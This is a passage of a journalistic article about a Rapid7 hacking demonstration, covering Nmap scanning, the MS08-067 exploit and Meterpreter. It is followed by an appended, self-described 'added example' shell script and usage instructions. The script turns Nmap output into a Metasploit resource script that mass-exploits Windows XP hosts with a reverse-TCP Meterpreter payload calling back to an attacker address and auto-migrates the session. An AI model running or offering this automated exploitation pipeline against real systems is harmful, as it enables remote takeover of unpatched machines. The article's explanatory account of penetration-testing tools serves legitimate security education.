The whole thing is so convincing that when the company demonstrated it to a US senator who was visiting their offices, he immediately accused his head of press of being involved, despite having seen the entire process first hand.
2. Finding a way in, with Metasploit
But sometimes you just want to remotely take over a computer. What then?
The first thing to do is look for ways in. There are a number of discovery tools for this: sqlmap, which automatically finds SQL injection flaws in the databases behind web applications; Burp Suite, which is built for probing web applications; and the one we were using, Nmap, a type of program known as a port scanner.
Such applications are often likened to walking down the street, trying every door just to check if one is unlocked, but that slightly underestimates the scale of the thing. Tools like Nmap are more akin to walking through a city trying every door, window, and loose-looking brick while simultaneously making a note of how many locks they have, what type of key they take, and when they look like they were built.
After just 45 seconds, the scan was done. It had identified our target: a computer running Windows XP Service Pack 2, released in 2004 and superseded by Service Pack 3 in 2008. (It was technically superseded by Windows Vista in 2007, but we don’t talk about Vista anymore.) Such a setup may seem like our poor sap — in reality a virtual machine running on Belton’s laptop — was being stitched up, but decade-old installations are depressingly common in the business world.
A few more keystrokes, and I launched the program which would get me inside: Metasploit.
The jewel in Rapid7’s arsenal, Metasploit is a one-stop shop for cracking into computers. The framework itself is over a decade old, but has been steadily updated with new exploit modules as vulnerabilities have been disclosed. It is never at the cutting edge, where security researchers are finding new holes: a module usually arrives only once a flaw is public, and often once a patch already exists, but what it lacks in currency it makes up for in ease of use.
Like all software for penetration testers, Metasploit has a strong contingent of users who are more interested in just seeing what they can break into. “Let’s be honest, that’s what everyone uses it for,” says a Rapid7 PR sitting in on the master class.
With Belton’s help, I picked the particular faulty door I would make my way through. According to Nmap, our target was running the Windows Server service, which comes installed on every XP computer and lets machines share files back and forth over the network. The unpatched version the target had has a known vulnerability, fixed by Microsoft in October 2008 as MS08-067 (“a parsing flaw in the path canonicalization code of NetAPI32.dll,” in Rapid7’s description). Using Metasploit, a single command exploits that flaw to deliver the third and final part of our assault, Meterpreter.
3. Taking control with Meterpreter
Running on the target computer, Meterpreter provides a backdoor through which I can take control of pretty much anything. The program never installs itself to disk, running only in memory, and only a particularly attentive target will notice an unfamiliar process in Task Manager. If even that is too much risk, one further command can “migrate” Meterpreter into another, legitimate-looking process, which makes it much harder to spot and also keeps the session alive if the exploited service crashes or is restarted.
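The three steps above, scan, exploit, and post-exploitation, as an added example that is not the article’s or Rapid7’s own code. The live Nmap scan is wrapped in a function so the file runs offline; the grepable scan output it parses is constructed for illustration, as are the 192.168.56.x addresses and the ms08.rc filename. The Metasploit module, payload and option names are real ones.

```shell
#!/bin/sh
# Added example, not from the article or Rapid7: turn an Nmap scan into the
# Metasploit commands for the attack described above. The host addresses, the
# sample scan output and the ms08.rc filename are constructed for illustration.

# Step 1, the live scan the article describes. Wrapped in a function so this
# file runs offline; call it yourself only against a lab network you own.
# -sV grabs service banners, -O fingerprints the OS, -oG writes grepable output.
scan_live() {
    nmap -sV -O -p 135,139,445 -oG "$2" "$1"
}

# Constructed stand-in for Nmap's grepable (-oG) output: one XP SP2 box with the
# Server service reachable on 445, one XP box that filters 445, one Windows 7
# host that is not affected, and the scanning laptop itself.
sample_gnmap() {
    printf 'Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tOS: Microsoft Windows XP SP2 or SP3\n'
    printf 'Host: 192.168.56.102 ()\tPorts: 135/open/tcp//msrpc///, 445/filtered/tcp//microsoft-ds///\tOS: Microsoft Windows XP SP2 or SP3\n'
    printf 'Host: 192.168.56.103 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows 7 SP1\n'
    printf 'Host: 192.168.56.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.6/\tOS: Linux 5.X\n'
}

# Step 2: from grepable output, emit a Metasploit resource script that fires
# exploit/windows/smb/ms08_067_netapi at every host that looks vulnerable, i.e.
# fingerprinted as Windows XP with 445/tcp open. Arguments: gnmap file, LHOST,
# optional LPORT (default 4444). The OS match is only a heuristic; running
# "check" inside the module is the real test before exploiting.
gen_msf_rc() {
    awk -v lhost="$2" -v lport="${3:-4444}" -F '\t' '
        $1 ~ /^Host:/ {
            ip = $1
            sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
            open445 = 0; xp = 0
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^Ports:/ && $i ~ /445\/open\/tcp/) open445 = 1
                if ($i ~ /^OS:/ && $i ~ /Windows XP/) xp = 1
            }
            if (open445 && xp) {
                print "use exploit/windows/smb/ms08_067_netapi"
                print "set RHOSTS " ip
                print "set PAYLOAD windows/meterpreter/reverse_tcp"
                print "set LHOST " lhost
                print "set LPORT " lport
                # step 3: migrate out of the exploited service process as soon
                # as the session opens, so it survives a crash of that service
                print "set AutoRunScript post/windows/manage/migrate"
                print "exploit -j -z"
            }
        }' "$1"
}

# Offline demo: generate the resource script from the constructed scan.
tmp=$(mktemp)
sample_gnmap > "$tmp"
gen_msf_rc "$tmp" 192.168.56.1
rm -f "$tmp"
```

Against a real lab the flow is `scan_live 192.168.56.0/24 scan.gnmap`, then `gen_msf_rc scan.gnmap <your LHOST> > ms08.rc`, then `msfconsole -q -r ms08.rc`. Once a session opens, `sessions -i 1` attaches to it, `ps` lists the target’s processes, and `migrate <pid>` does by hand what the AutoRunScript line does automatically. The exploit is only built for the filter’s narrow case (XP with the Server service exposed), so hosts like the Windows 7 box in the sample are correctly left out.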